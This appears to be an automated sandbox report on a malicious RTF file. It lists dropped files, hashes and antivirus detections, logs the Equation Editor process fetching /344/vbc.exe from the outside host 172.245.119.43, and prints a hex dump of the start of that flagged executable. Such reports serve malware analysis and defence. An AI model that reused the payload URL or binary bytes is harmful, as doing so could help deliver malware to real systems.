                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: A3hamzfUkW.rtf, Detection: malicious, Browse
                                              • Filename: 7027521.xlsx, Detection: malicious, Browse
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: BL Copy.doc, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: HealthSystray.exe, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: listing new.xlsx, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: PO-C - 20211213-PLATE.doc, Detection: malicious, Browse
                                              • Filename: new.xlsx, Detection: malicious, Browse
                                              • Filename: 8#Ub2e4).exe, Detection: malicious, Browse
                                              • Filename: eW8Jsngljx.exe, Detection: malicious, Browse
                                              • Filename: o4XzTr73Ut.exe, Detection: malicious, Browse
                                              • Filename: uDZovIdfEJ.exe, Detection: malicious, Browse
                                              • Filename: q6JYc6gWld.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):72
                                              Entropy (8bit):4.721620404569601
                                              Encrypted:false
                                              SSDEEP:3:bDuMJlR6AYVomxWC7mAYVov:bCampiy
                                              MD5:81E8E456A53FD8E9D9B43D0E1AC89A8B
                                              SHA1:7EBCF0F200D0091B38DED9ADCEFB81FE065ACE90
                                              SHA-256:AD45C73A660154D22505435165ECA582B79787943C1449C661F5EA65514A356A
                                              SHA-512:3E3C1BE10D07FA7D15469C09A14926623F33ACB2C43A1ECEB709D03A3AFE0D2E71D8AA6A415A40578FA1C74FC6C7C2795DC2464EB4FA8845BA135D6BA42A6460
                                              Malicious:false
                                              Preview:[folders]..Templates.LNK=0..lUkTchBi9r.LNK=0..[misc]..lUkTchBi9r.LNK=0..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 27 17:54:15 2022, mtime=Thu Jan 27 17:54:15 2022, atime=Thu Jan 27 17:54:19 2022, length=25648, window=hide
                                              Category:dropped
                                              Size (bytes):1014
                                              Entropy (8bit):4.546912770949215
                                              Encrypted:false
                                              SSDEEP:12:8p8YCFgXg/XAlCPCHaXvB4XB/7WX+WeG5aicvbkGeWr643aDtZ3YilMMEpxRljKW:8p8Yu/XT/4sAaxe3eWlaDv3qwQd7Qy
                                              MD5:55AE2C3C65090224B17A16678F6D753E
                                              SHA1:19DCF9FA09A937AF7124D3100F72318AC717C6EB
                                              SHA-256:F637F6EEB65DDDF8B6802E79102F58029F327FB46D4CB656E8F7DFA5493428BD
                                              SHA-512:C6053C7F4DD6E1894882841AD8F4BDBEC112CB0FAB38CE0FB7BFEC4B5999A895D7762952BA26C8F30B3A6A9279D8E4C6638F047D7FDC0AED2D3DB3FCDA823191
                                              Malicious:false
                                              Preview:L..................F.... ...?..G....?..G....O.vJ....0d...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1.....;T...Desktop.d......QK.X;T.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.0d..;T. .LUKTCH~1.RTF..J......;T.;T.*.........................l.U.k.T.c.h.B.i.9.r...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\lUkTchBi9r.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.l.U.k.T.c.h.B.i.9.r...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):95632
                                              Entropy (8bit):7.524133406272662
                                              Encrypted:false
                                              SSDEEP:1536:2/T2X/jN2vxZz0DTHUpouZZbUc6JgjJPQPovf/5AmNHLBH8k29xE+1Gl1c:2bG7N2kDTHUpouZZbUc6JgjJ4PKfRAI6
                                              MD5:82C5CDDE9DF0A76E2933C1CD8BFC7887
                                              SHA1:7B391B4429DFBF19030FB49CE750AA3C8B844A6B
                                              SHA-256:243AE30D42E90000B882779FAE40E0056EAB332B95E2C938446138A80868909E
                                              SHA-512:EE64B01A269422E45A458D9E77151435ECFBDEB96B2C7D80E961F3E4CFBACB9626F2DF1CB32790DFA174AA2D517868ABD4FD8A9FBED3C5B8FEAC3DAE0A790C7E
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 11%, Browse
                                              • Antivirus: ReversingLabs, Detection: 21%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................".....@.............................................(............`...............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.802058116853092
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:lUkTchBi9r.rtf
                                              File size:25648
                                              MD5:4f51af14d712b6214c64090a79cb228b
                                              SHA1:6bf1f72ade16239db6cc14d13191b11278308dd6
                                              SHA256:7a3188668cd5ef9ed4e17d9f41a9b5eb22690eb9d6151caf9933f121bfbcedbe
                                              SHA512:ae6464715ec75e9a15f2fe63e979e4631701d0956775a166a63cf920ea8e0378e6ef68e92bada2e680f49964622316f397978351332b1905f66fba10335811f2
                                              SSDEEP:768:gn/EbQIVA60WUsnfkbfyipgZzPcuairmgnkeB9QjzO:gSpXfkLyipgUirmgnkeB9czO
                                              File Content Preview:{\rtf977*^_^~`&%*?~1>`)~0,.%#?.:659!%??;_;>?!!?+*-6_>2@64.4:^>:>(~:.,8@|&+=@<//?,1>283?5';;;'06>>[+:^,4?^*;5/&)$%+$.&?<3+2^,_!&.??`4.)?6/.?3+,]).__.]7]$52-)!:&=6*..-+.@$+6-|+?2';2?*..4.:&:]*?^~>88)3$.$^%;$2.=~..^97)(1-^6?/?]](0%.?]/#>9:^|-?%<5/&?;._.$.7#8
                                              Icon Hash:e4eea2aaa4b4b4a4
                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              0000020D3hno
                                              10000208Chno
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 27, 2022 10:55:12.455380917 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.577143908 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.577210903 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.577631950 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695378065 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695427895 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695475101 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695483923 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695543051 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695544004 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695554018 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695590019 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695607901 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695642948 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695693016 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695697069 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695703983 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695746899 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695796967 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695806980 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695816994 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.695853949 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.695946932 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.696029902 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.709883928 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810214996 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810261011 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810292006 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810332060 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810368061 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810415983 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810465097 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810507059 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810538054 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810554028 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810585022 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810600042 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810631037 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810638905 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810643911 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810647011 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810648918 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810655117 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810702085 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810722113 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810745001 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810755968 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810800076 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810805082 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810806990 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810848951 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810873032 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810914993 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810965061 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.810973883 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.810981989 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.811016083 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.811070919 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.811074972 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.811080933 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.812537909 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.814393044 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925565958 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925607920 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925636053 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925662041 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925687075 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925712109 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925719976 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925739050 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925755024 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925760984 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925764084 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925765038 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925779104 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925790071 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925817966 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925822973 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925843000 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925848007 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925863981 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925884962 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925911903 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925931931 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925931931 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925936937 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925961971 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925973892 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.925978899 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.925981045 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926004887 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926016092 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926022053 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926032066 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926058054 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926073074 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926079988 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926080942 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926106930 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926121950 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926126957 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926131964 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926156998 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926165104 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926171064 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926181078 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926204920 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926215887 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926222086 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926232100 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926256895 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926265001 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926271915 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926282883 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926307917 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926318884 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926325083 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926332951 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926358938 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926371098 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926377058 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926383972 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926409006 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926423073 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926429033 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926435947 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926460981 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926474094 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926481009 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926486969 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.926527977 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.926534891 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.928920984 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.930586100 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.930604935 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.930622101 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.930639982 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:12.930752993 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.930777073 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.937912941 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:12.940726042 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:13.043730974 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:13.043800116 CET8049165172.245.119.43192.168.2.22
                                              Jan 27, 2022 10:55:13.043823004 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:13.043884039 CET4916580192.168.2.22172.245.119.43
                                              Jan 27, 2022 10:55:14.450773001 CET4916580192.168.2.22172.245.119.43
                                              • 172.245.119.43
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165172.245.119.4380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jan 27, 2022 10:55:12.577631950 CET0OUTGET /344/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 172.245.119.43
                                              Connection: Keep-Alive
                                              Jan 27, 2022 10:55:12.695378065 CET1INHTTP/1.1 200 OK
                                              Date: Thu, 27 Jan 2022 09:55:12 GMT
                                              Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                              Last-Modified: Sun, 23 Jan 2022 15:50:13 GMT
                                              ETag: "17590-5d641cec22e87"
                                              Accept-Ranges: bytes
                                              Content-Length: 95632
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 22 da 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 d8 60 01 00 b8 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@"@(`.texthj `.rdatan@@.data@.ndata``.rsrc(@@
                                              Jan 27, 2022 10:55:12.695427895 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4 57
                                              Data Ascii: U\}t+}FEuHOCHPuuu@BSV5OCEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                              Jan 27, 2022 10:55:12.695483923 CET4INData Raw: 00 e9 f9 16 00 00 8b 88 e0 4f 43 00 89 88 80 4f 43 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 80 4f 43 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 80 4f 43 00 57 e9 31 16 00 00 8b 0d d0 3e 43 00 8b 35 50 82
                                              Data Ascii: OCOCE4OC3;#MDE4OCW1>C5P@;tuQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu
                                              Jan 27, 2022 10:55:12.695543051 CET6INData Raw: 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb 12
